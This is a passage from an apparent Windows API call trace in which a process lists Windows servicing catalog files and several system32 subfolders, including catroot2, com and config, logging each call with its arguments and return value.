lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x42612d4b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x42612d4b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x32296900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICFFA~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039036, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5039036, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x6c950500, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MID6B3~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 101 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56cc7b25, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56cc7b25, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba0f7300, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2836, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI2A57~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60faeba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x60faeba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x110d4c00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x284e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE8C6~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x641146cc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x641146cc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x276ed400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MICA07~1.CAT")) returned 1 [0060.405] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 91 [0060.405] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2c9f194a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2c9f194a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae1bb500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2846, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5A20~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-ClipsInTheLibrary-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3a0c5c56, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3a0c5c56, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xba077700, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x3288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIE32A~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Encoder-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x420457a0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x420457a0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIB8B4~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5e06085a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5e06085a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc03c900, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC384~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x39f6eff3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x39f6eff3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3f05d00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0xe621, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC5BA~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x567dedbc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x567dedbc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x145c0400, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x19ad9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIE7EE~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x47b04cb, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x47b04cb, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x516cca00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2209b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI24C9~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56c55704, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x56c55704, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x47eb5e00, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x5a4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4862~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 94 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6062939, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6062939, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb673f000, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x1a933, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC1F3~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 89 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33b02f1a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33b02f1a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacea8800, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIDC5E~1.CAT")) returned 1 [0060.406] lstrlenW (lpString="Microsoft-Windows-DesktopWindowManager-uDWM-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0060.406] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x709542fd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x709542fd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9c420e00, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI884F~1.CAT")) returned 1 [0060.407] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 88 [0060.407] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x33bc15fc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x33bc15fc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa4924d00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI5892~1.CAT")) returned 1 [0060.407] lstrlenW (lpString="Microsoft-Windows-Disk-Diagnosis-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0060.407] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x348ff074, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x348ff074, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x123e7900, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIC479~1.CAT")) returned 1 [0060.407] lstrlenW (lpString="Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0060.407] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe4136930, ftCreationTime.dwHighDateTime=0x1cb892a, ftLastAccessTime.dwLowDateTime=0xe4136930, ftLastAccessTime.dwHighDateTime=0x1cb892a, ftLastWriteTime.dwLowDateTime=0x56317e00, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x1ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIEF23~1.CAT")) returned 1 [0060.407] lstrlenW (lpString="Microsoft-Windows-EnterpriseEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 86 [0060.407] FindNextFileW (in: hFindFile=0x71b7f8, lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1188fe7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x1188fe7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x55005100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x39463e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MID8CB~1.CAT")) returned 1 [0060.407] lstrlenW (lpString="Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0060.408] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0060.408] lstrlenW (lpString="Microsoft-Windows-Gadget-Platform-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0060.408] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 85 [0060.408] lstrlenW (lpString="Microsoft-Windows-GPUPipeline-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 80 [0060.409] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0060.409] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 97 [0060.409] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0060.409] lstrlenW (lpString="Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0060.409] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0060.409] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAPS-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0060.409] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 93 [0060.409] lstrlenW (lpString="Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 88 [0060.409] lstrlenW (lpString="Microsoft-Windows-Help-Customization-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 92 [0060.413] FindClose (in: hFindFile=0x71b7f8 | out: hFindFile=0x71b7f8) returned 1 [0060.413] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b5a0 | out: hHeap=0x6e0000) returned 1 [0060.413] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.414] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a340 | out: hHeap=0x6e0000) returned 1 [0060.414] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x71a340 [0060.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\*", lpFindFileData=0x71a340 | out: lpFindFileData=0x71a340*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x486905c0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x486905c0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76ceddac, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76ceddac, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76ceddac, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71b7f8 [0060.414] FindClose (in: hFindFile=0x71b7f8 | out: hFindFile=0x71b7f8) returned 1 [0060.414] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b5a0 | out: hHeap=0x6e0000) returned 1 [0060.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x71b5a0 | out: lpFindFileData=0x71b5a0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84bfae1, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x8851be8, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x8851be8, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71b7f8 [0060.414] FindClose (in: hFindFile=0x71b7f8 | out: hFindFile=0x71b7f8) returned 1 [0060.415] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71b5a0 | out: hHeap=0x6e0000) returned 1 [0060.415] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.415] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71a340 | out: hHeap=0x6e0000) returned 1 [0060.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\*", lpFindFileData=0x71c9d0 | out: lpFindFileData=0x71c9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5f9c6, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e470555, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\dmp\\*", lpFindFileData=0x71dce0 | out: lpFindFileData=0x71dce0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xa35dd730, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71df38 [0060.418] FindClose (in: hFindFile=0x71df38 | out: hFindFile=0x71df38) returned 1 [0060.418] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71dce0 | out: hHeap=0x6e0000) returned 1 [0060.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\com\\en-US\\*", lpFindFileData=0x71dce0 | out: lpFindFileData=0x71dce0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e470555, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e470555, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71df38 [0060.419] FindClose (in: hFindFile=0x71df38 | out: hFindFile=0x71df38) returned 1 [0060.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71dce0 | out: hHeap=0x6e0000) returned 1 [0060.419] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71c9d0 | out: hHeap=0x6e0000) returned 1 [0060.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\*", lpFindFileData=0x71de48 | out: lpFindFileData=0x71de48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xf1e088, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\Journal\\*", lpFindFileData=0x71d9d8 | out: lpFindFileData=0x71d9d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71e0a0 [0060.421] FindClose (in: hFindFile=0x71e0a0 | out: hFindFile=0x71e0a0) returned 1 [0060.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d9d8 | out: hHeap=0x6e0000) returned 1 [0060.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\RegBack\\*", lpFindFileData=0x71d9d8 | out: lpFindFileData=0x71d9d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71e0a0 [0060.423] FindClose (in: hFindFile=0x71e0a0 | out: hFindFile=0x71e0a0) returned 1 [0060.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d9d8 | out: hHeap=0x6e0000) returned 1 [0060.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\*", lpFindFileData=0x71d9d8 | out: lpFindFileData=0x71d9d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xef7f2e, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xef7f2e, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71e0a0 [0060.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\*", lpFindFileData=0x71f0e8 | out: lpFindFileData=0x71f0e8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xef7f2e, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x51ab36f5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x51ab36f5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71f340 [0060.424] FindFirstFileW (in: 